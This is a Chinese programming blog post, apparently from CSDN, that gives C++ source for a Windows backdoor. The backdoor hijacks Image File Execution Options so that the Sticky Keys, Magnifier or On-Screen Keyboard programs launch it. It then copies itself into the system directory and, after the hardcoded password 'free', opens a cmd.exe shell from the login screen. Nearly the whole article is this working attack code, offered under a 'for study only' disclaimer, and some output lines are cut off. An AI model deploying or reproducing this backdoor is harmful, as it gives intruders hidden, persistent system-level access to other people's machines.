C语言,后门程序,C++映像劫持后门实例分析

最新推荐文章于 2023-08-17 12:45:25 发布
最新推荐文章于 2023-08-17 12:45:25 发布
阅读量225 收藏 2
点赞数
文章标签: C语言 后门程序

// freeheart.cpp : Defines the entry point for the console application.

//学习交流使用,违法使用后果自负。

// by:cnblogs.com/blogg time 2013.5.24

// argv 0 = freeheart.exe

// argv 1 = -i

// argv 2 = name.exe

// argv 3 = 1 2 3

// 此程序使用的映像劫持技术,

// 在注册表当中建立一个程序名的项目,在里面使用debugger,然后在里面指向自己的程序。

//[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

//

#include "stdafx.h"

#include "windows.h"

#include "atlbase.h"

#include

using namespace std;

int main(int argc, char* argv[])

{

void anzhuang(char *Path,char *filename);

void xiezai(char *path,char *hName);

void CopyZiji(char *CopyPath);

char *password = "free"; //真密码缓冲区

char *shuruPwd = ""; //输入的密码缓冲区

int errorbuff = 0;

char *PathBuff = "";

char *FileName = "";

char *chsname = "sethc.exe"; //SHIFT粘贴键程序的名称

char *fangdajing = "magnify.exe"; //

char *pingmujianpan = "osk.exe"; //

LPTSTR sysbuff; //得到系统路径的缓冲区

TCHAR tchBuffer2[1024]; //申请一个字符变量数组

sysbuff = tchBuffer2; //把系统的路径放到这个变量数组里

if(GetSystemDirectory(sysbuff, MAX_PATH)) //得到系统路径

{

sysbuff = strcat(sysbuff,"\\"); //strcat 剪切在一起,把\\放在系统路径的后面,然后放入系统缓冲区当中。

}

if (argv[1] != NULL)

{

//安装命令判断

if (strcmp(argv[1],"-i") == 0)

{

if (argv[2] != NULL)

{

FileName=argv[2];

}

else

{

cout<

return 0;

}

if(argv[3] != NULL)

{

if(strcmp(argv[3],"1") == 0)

{

anzhuang(FileName,chsname);

PathBuff = strcat(sysbuff,FileName);

CopyZiji(PathBuff);

cout<

return 0;

}

if(strcmp(argv[3],"2") == 0)

{

anzhuang(FileName,fangdajing);

PathBuff = strcat(sysbuff,FileName);

CopyZiji(PathBuff); //调用函数

cout<

return 0;

}

if(strcmp(argv[3],"3") == 0)

{

anzhuang(FileName,pingmujianpan);

PathBuff = strcat(sysbuff,FileName);

CopyZiji(PathBuff); //调用函数

cout<

return 0;

}

}

else

{

cout<

}

return 0;

}

//卸载

if (strcmp(argv[1],"-u") == 0)

{

if(argv[2] != NULL)

{

if(strcmp(argv[2],"1") == 0)

{

xiezai(sysbuff,chsname);

cout<

return 0;

}

if(strcmp(argv[2],"2") == 0)

{

xiezai(sysbuff,fangdajing);

cout<

return 0;

}

if(strcmp(argv[2],"3") == 0)

{

xiezai(sysbuff,pingmujianpan);

cout<

return 0;

}

}

else

{

cout<

}

return 0;

}

//为什么会进入这里 因为debugger a.exe 其实是两个参数,因为if (argv[1] != NULL) 也就是第二个参数不等于空的话执行下面的语句。

while(errorbuff<3) //循环三次,错误。

{

cout<

cin>>shuruPwd;

if (strcmp(shuruPwd,password) == 0)

{

system("cmd.exe");

break;

}

else

{

cout<

}

errorbuff++; //自加一次

}

return 0;

}

system("color a");

cout<

cout<

cout<

cout<

cout<

cout<

cout<

cout<

cout<

cout<

return 0;

}

//安装函数

void anzhuang(char *Path,char *filename)

{

HKEY hSoftKey = NULL;

HKEY hCompanyKey = NULL;

if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"), 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)

{

if (RegCreateKeyEx(hSoftKey, _T(filename), 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_WRITE|KEY_READ, NULL,&hCompanyKey,NULL) == ERROR_SUCCESS)

{

LPBYTE Value=(LPBYTE)Path;

long ret1=::RegSetValueEx(hCompanyKey,"Debugger",0,REG_SZ,(BYTE*)Value,50);

RegCloseKey(hCompanyKey);

}

RegCloseKey(hSoftKey);

}

}

//卸载函数

void xiezai(char *path,char *hName) //hName 传递进来的程序名

{

HKEY hSoftKey = NULL;

LPCTSTR hMainKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options";

if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, hMainKey, 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)

{

DWORD len = 256;

DWORD type = REG_SZ;

LPBYTE last = new BYTE[256];

LPCTSTR hname = (LPCTSTR)hName;

char *HHname;

HKEY hKey; //在注册表当中创建一个magnify名的项,在里面当中加入debugger,里面跟上自己的程序名的值。

char* DelCom;

HHname=strcat((char *)hMainKey,"\\"); //hmainkey 注册表的路径

HHname=strcat((char *)hMainKey,(char *)hname); //hname 程序名

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)HHname,0,KEY_READ,&hKey)==ERROR_SUCCESS && RegQueryValueEx(hKey,"Debugger",0,&type,last,&len)==ERROR_SUCCESS)

{

DelCom=strcat(path,reinterpret_cast (last));

DeleteFile(DelCom); //删除文件

RegDeleteKey(hSoftKey,hname); //删除注册表

}

RegCloseKey(hSoftKey); //关闭句柄

RegCloseKey(hKey); //关闭句柄

}

}

void CopyZiji(char *CopyPath) //将自身生成exe文件复制到指定的路径下

{

char PathBuff[MAX_PATH]; //申请一个字符变量数组,大小是系统最大的长度。

GetModuleFileName(NULL,PathBuff,MAX_PATH); //第一个参数为NULL,就表示获取当前程序的路径,第二个参数就是存放到缓冲区。

CopyFile(PathBuff,CopyPath,true); //CurrentPath 是自身exe,把自身复制到目标路径当中

}

Max Joy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
51单片机C语言应用程序设计实例精讲
03-24
51单片机C语言应用程序设计实例精讲.pdf 介绍了关于51单片机C语言应用程序设计实例精讲的详细说明,提供单片机的技术资料的下载。
使用C语言C++程序例子.rar
01-04
通过这个压缩包“使用C语言C++程序例子.rar”,我们可以学习到如何实现这种互操作性,这对于理解和优化多语言项目至关重要。 首先,C++是一种比C更强大的语言,它提供了类、对象和面向对象编程的概念。然而,...
Windows权限维持—自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon
剁椒鱼头没剁椒的博客
08-17 1509
在Windows系统中,很多后门利用的方式不是太会区别在域中还是单机上,只是需要考虑在没有网络情况下,如何将shell反弹回来,就比如,在域中一个无网络的主机和一台有网络的主机,前期通过有网络的主机转发上线到无网络主机上,那么我们木马是不是也可以这样设置,在无网络中设置一个正向木马,让其在运行,在有网络中设置一个反向的木马,让其运行,那么我们去连接的时候只要去连接反向木马就可以了,然后在通过这个反向木马去连接正向木马,不就可以了。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。
系统安全:后门
垃圾管理员的垃圾站
07-19 1161
后门(backdoor)。 在日常生活中,我们通常会说“走后门”这个词。何为后门?就是不是前面的门!这是废话,但是含义颇深。前门,或者说正门,可以用来光明正大的做事,迎宾,娶妻等等。而后门不同,它不是给别人看的,比如什么什么的(都说了不是给外人看的)。 举个不那么恰当的例子,小孩a,爸爸A。小孩要上学,学业不好,进不了特别好的学府。我们知道要进一所学校,需要一套标准的考核,来...
C/C++实现windows下的映像劫持(上)之原理分析
热门推荐
单核CPU的小朋友的博客
09-09 5万+
本篇博客将来和大家进行“C/C++实现windows下的映像劫持的原理分析” 什么是映像劫持映像劫持病毒是近几年来对用户系统安全破坏程度最大的病毒之一,它将大量安全软件”绑架”, 使其无法正常运行,从而大大降低用户系统的安全性。 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些...
C++代码静态检测
求你别报错
03-02 1091
C++代码静态检测一,CppCheck二,TscanCode三,PVS-studio代码静态检测,指的是程序在非运行状态下,对代码进行语法分析,检测其规范性和语法错误的一种操作。主要借助的都是一些第三方工具,比如CppCheck,TscanCode,PVS-studio等,本文主要对这几种常用的检测工具的使用进行介绍,并且都附上下载链接以及免费破解版。(付费的代码检测工具不在讨论范围内...
终极版C语言(十六)
03-21
整个教程以 C++ 语言为核心,完整精彩的演练了数据结构、算法、设计模式、数据库、大数据高并发检索、文件重定向、多线程同步、进程通讯、黑客劫持技术、网络安全、加密解密,以及各种精彩的小项目等,非常适合大家学习。讲课生动风趣、深入浅出,全套视频内容充实。
c语言c++项目源代码-c语言电子时钟程序.zip
05-20
c语言c++项目源代码_c语言电子时钟程序.zip个人98分大作业设计项目,代码完整下载可用,纯手打高分大作业设计,可作为期末大作业和课程设计,小白也可实战。 实现的功能:可以显示时分秒、星期、公历、闹钟、环境...
C语言C++语言程序设计教案pdf
最新发布
07-20
C语言C++语言 C语言是国际上广泛流行的、很有发展前途的计算机高级语言。B语言发展起来的,根源可以追溯到ALGOL60。1960年出现的ALGOL60,离硬件比较远。 1963年英国剑桥大学推出了CPL(COMBINEDPROGRAMMING ...
C语言C++简明教程
10-13
在编程世界中,C语言C++是两个广泛使用的编程语言,它们各有特色,但C++作为C语言的超集,提供了更多的高级特性。本文档“从C语言C++简明教程”将引导你从熟悉C语言的基础出发,逐步过渡到掌握C++的核心概念和...
VC++打造后门.
11-07
VC++打造后门.由于文件太大分两部分上传,下载完后阅读
MFC程序的注册表编程(自启动、映像劫持、文件关联)-C++文档类资源
04-20
这学期考研要看书所以没时间编程,今日手痒逞周末时间研究了一下注册表编程,通过自启动、映像劫持、文件关联三个功能及其恢复功能基本熟悉了注册表编程的大部分内容,以后做什么邪恶的东东肯定做得到~
C++映像劫持后门实例分析
09-03
主要介绍了C++映像劫持后门,实例分析C++映像劫持后门的原理与相关实现技巧,有助于进一步了解后门的原理,需要的朋友可以参考下
windows后门程序windows后门程序
02-02
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
C语言,后门程序,c语言windows后门
weixin_31741271的博客
05-18 274
c语言windows后门在WINDOWS服务器渗透的时候可能用的着,也可以让xx界里的朋友学点东西功能在帐户有组策略限制的时候,无法添加管理员账号的时候,可以不用密码登陆。测试在XP,2000,2003上过。运行后不需要用密码。模仿GOLDSUN的那个写的。// get.cpp : 定义控制台应用程序的入口点。//#include "stdio.h"#include #include BOOL E...
安全之路 —— C/C++实现后门的服务自启动
雨者
05-04 2226
简介 Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。 C++代码样例 ////////////////////////////////////////////////////////////// // // F...
VC++编程实现镜像劫持
weixin_30828379的博客
10-24 85
所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以杀毒软件主程序命名的项,例如Rav.exe。然后再创建一个子键“Debugger="C:\WINDOWS\system32\drivers\”。以后只要用户双击 R...
C++程序设计基础-从C语言C++的发展历程
"C++程序设计相关课件,源自谭浩强的著作,由南京理工大学陈清华和朱红制作的清华大学出版社课件。内容涵盖了C++语言的发展历程、主要特点以及其与C语言的关系。" 在深入理解C++编程之前,我们首先需要了解C++的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值